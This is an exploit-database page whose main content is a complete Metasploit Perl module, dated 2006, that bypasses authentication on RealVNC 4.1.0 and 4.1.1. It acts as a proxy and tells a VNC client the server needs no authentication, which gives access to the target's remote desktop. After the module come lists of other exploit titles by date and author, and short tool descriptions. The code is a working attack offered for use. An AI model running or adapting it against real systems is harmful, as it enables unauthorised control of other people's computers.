Menu

Search for hundreds of thousands of exploits

"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)"

Author

Exploit author

"H D Moore"

Platform

Exploit platform

multiple

Release date

Exploit published date

2006-05-15

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::realvnc_41_bypass;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use POSIX;

my $advanced = {};
my $info =
  {
	'Name'           => 'RealVNC 4.1 Authentication Bypass',
	'Version'        => '$Revision: 1.1 $',
	'Authors'        => [ 'H D Moore <hdm[at]metasploit.com>' ],
	'Description'    =>
	  Pex::Text::Freeform(qq{
		This module exploits an authentication bypass flaw in version
	4.1.0 and 4.1.1 of the RealVNC service. This module acts as a proxy
	between a VNC client and a vulnerable server. Credit for this should
	go to James Evans, who spent the time to figure this out after RealVNC
	released a binary-only patch.
}),

	'Arch'           => [  ],
	'OS'             => [  ],
	'Priv'           => 0,

	'UserOpts'       =>
	  {
		'LPORT'   => [ 1, 'PORT', 'The local VNC listener port',  5900      ],
		'LHOST'   => [ 1, 'HOST', 'The local VNC listener host', "0.0.0.0"  ],
		'RPORT'   => [ 1, 'PORT', 'The remote VNC target port', 5900      ],
		'RHOST'   => [ 1, 'HOST', 'The remote VNC target host'],
		'AUTOCONNECT' => [1, 'DATA', 'Automatically launch vncviewer', 1],
	  },

	'Refs'            =>
	  [
		['URL', 'http://secunia.com/advisories/20107/']
	  ],

	'DefaultTarget'  => 0,
	'Targets'        =>
	  [
		[ 'RealVNC' ],
	  ],

	'Keys'           => [ 'realvnc' ],

	'DisclosureDate' => 'May 15 2006',
  };

sub new
{
	my $class = shift;
	my $self;

	$self = $class->SUPER::new(
		{
			'Info'     => $info,
			'Advanced' => $advanced,
		},
		@_);

	return $self;
}

sub Exploit
{
	my $self = shift;
	my $server = IO::Socket::INET->new(
		LocalHost => $self->GetVar('LHOST'),
		LocalPort => $self->GetVar('LPORT'),
		ReuseAddr => 1,
		Listen    => 1,
		Proto     => 'tcp');
	my $client;

	# Did the listener create fail?
	if (not defined($server))
	{
		$self->PrintLine("[-] Failed to create local VNC listener on " . $self->GetVar('SSHDPORT'));
		return;
	}

	if ($self->GetVar('AUTOCONNECT') =~ /^(T|Y|1)/i) {
    	if (! fork()) {
        	system("vncviewer 127.0.0.1::".$self->GetVar('LPORT'));
        	exit(0);
    	}		
	}

	$self->PrintLine("[*] Waiting for VNC connections to " . $self->GetVar('LHOST') . ":" . $self->GetVar('LPORT') . "...");

	while (defined($client = $server->accept()))
	{
		$self->HandleVNCClient(fd => Msf::Socket::Tcp->new_from_socket($client));
	}

	return;
}

# Stolen from InjectVNCStage.pm
sub HandleVNCClient
{
	my $self = shift;
	my ($fd) = @{{@_}}{qw/fd/};
	my $rhost;
	my $rport;

	# Set the remote host information
	($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);

	# Create a connection to the target system
	my $s = Msf::Socket::Tcp->new(
		'PeerAddr' => $self->GetVar('RHOST'),
		'PeerPort' => $self->GetVar('RPORT'),
		'SSL'      => $self->GetVar('SSL')
	);
	
	if ($s->IsError) {
		$self->PrintLine('[*] Could not connect to the target VNC service: ' . $s->GetError);
		$fd->Close;
		return;
	}
	
	my $res = $s->Recv(-1, 5);
	
	# Hello from server
	if ($res !~ /^RFB 003\.008/) {
		$self->PrintLine("[*] The remote VNC service is not vulnerable");
		$fd->Close;
		$s->Close;
		return;
	}
	# Send it to the client
	$fd->Send($res);
	
	# Hello from client
	$res = $fd->Recv(-1, 5);
	if ($res !~ /^RFB /) {
		$self->PrintLine("[*] The local VNC client appears to be broken");
		$fd->Close;
		$s->Close;
		return;
	}
	# Send it to the server
	$s->Send($res);
	
	# Read the authentication methods from the server
	$res = $s->Recv(-1, 5);
	
	# Tell the client that the server only supports NULL auth
	$fd->Send("\x01\x01");
	
	# Start pumping data between the client and server
	if (! fork()) {
		$self->PrintLine("[*] Proxying data between the connections...");
		$self->VNCProxy($s->Socket, $fd->Socket);
		exit(0);
	}
	return;
}

sub VNCProxy {
  my $self = shift;
  my $srv = shift;
  my $cli = shift;

  foreach ($srv, $cli) {
    $_->blocking(1);
    $_->autoflush(1);
  }

  my $selector = IO::Select->new($srv, $cli);

  LOOPER:
    while(1) {
      my @ready = $selector->can_read;
      foreach my $ready (@ready) {
        if($ready == $cli) {
          my $data;
          $cli->recv($data, 8192);
          last LOOPER if (! length($data));     
          last LOOPER if(!$srv || !$srv->connected);
          eval { $srv->send($data); };
          last LOOPER if $@;
        }
        elsif($ready == $srv) {
          my $data;
          $srv->recv($data, 8192);
          last LOOPER if(!length($data));
          last LOOPER if(!$cli || !$cli->connected);
          eval { $cli->send($data); };
          last LOOPER if $@;
        }
      }
    }
}


1;


# milw0rm.com [2006-05-15]
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2009-11-12 "Microsoft Windows Server 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)" dos windows "H D Moore"
2009-10-30 "Nagios3 - 'statuswml.cgi' Command Injection (Metasploit)" webapps unix "H D Moore"
2009-07-20 "DD-WRT HTTP v24-SP1 - Command Injection" remote linux "H D Moore"
2007-04-23 "Apple QuickTime for Java 7 - Memory Access (Metasploit)" remote multiple "H D Moore"
2006-11-13 "D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)" remote windows "H D Moore"
2006-11-13 "Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit)" remote windows "H D Moore"
2006-11-01 "Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit)" dos hardware "H D Moore"
2006-09-27 "Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (1)" remote windows "H D Moore"
2006-08-10 "Microsoft Internet Explorer - 'MDAC' Remote Code Execution (MS06-014) (Metasploit) (2)" remote windows "H D Moore"
2006-08-10 "Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)" remote windows "H D Moore"
2006-07-28 "Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution" remote multiple "H D Moore"
2006-07-25 "Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution (Metasploit)" remote multiple "H D Moore"
2006-07-14 "Mozilla Firefox 3.5 - escape Memory Corruption (Metasploit)" remote multiple "H D Moore"
2006-07-07 "Microsoft Internet Explorer 6 - 'Internet.HHCtrl' Heap Overflow" dos windows "H D Moore"
2006-06-22 "Microsoft Windows RRAS - Remote Stack Overflow (MS06-025) (Metasploit)" remote windows "H D Moore"
2006-05-15 "RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)" remote multiple "H D Moore"
2006-04-15 "Novell Messenger Server 2.0 - 'Accept-Language' Remote Overflow (Metasploit)" remote novell "H D Moore"
2006-03-30 "PeerCast 0.1216 - Remote Buffer Overflow (Metasploit)" remote windows "H D Moore"
2006-03-20 "X.Org X11 (X11R6.9.0/X11R7.0) - Local Privilege Escalation" local linux "H D Moore"
2006-03-01 "Apple Mail.App 10.5.0 (OSX) - Image Attachment Command Execution (Metasploit)" remote osx "H D Moore"
2006-02-28 "Microsoft Internet Explorer 6.0 SP0 - IsComponentInstalled() Remote (Metasploit)" remote windows "H D Moore"
2006-02-22 "Apple Mac OSX Safari Browser - 'Safe File' Remote Code Execution (Metasploit)" remote osx "H D Moore"
2006-02-17 "Microsoft Windows Media Player 9 - Plugin Overflow (MS06-006) (Metasploit)" remote windows "H D Moore"
2006-02-08 "Mozilla Firefox 1.5 (OSX) - 'location.QueryInterface()' Code Execution (Metasploit)" remote osx "H D Moore"
2006-02-07 "Mozilla Firefox 1.5 (Linux) - 'location.QueryInterface()' Code Execution (Metasploit)" remote linux "H D Moore"
2006-01-31 "Winamp 5.12 - '.pls' Remote Buffer Overflow (Metasploit)" remote windows "H D Moore"
2005-12-27 "Microsoft Windows XP/2003 - Metafile Escape() Code Execution (Metasploit)" remote windows "H D Moore"
2005-12-09 "Lyris ListManager - Read Message Attachment SQL Injection (Metasploit)" remote windows "H D Moore"
2005-11-20 "Google Search Appliance - proxystylesheet XSLT Java Code Execution (Metasploit)" remote hardware "H D Moore"
2005-10-19 "HP-UX 11.11 - lpd Remote Command Execution (Metasploit)" remote hp-ux "H D Moore" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected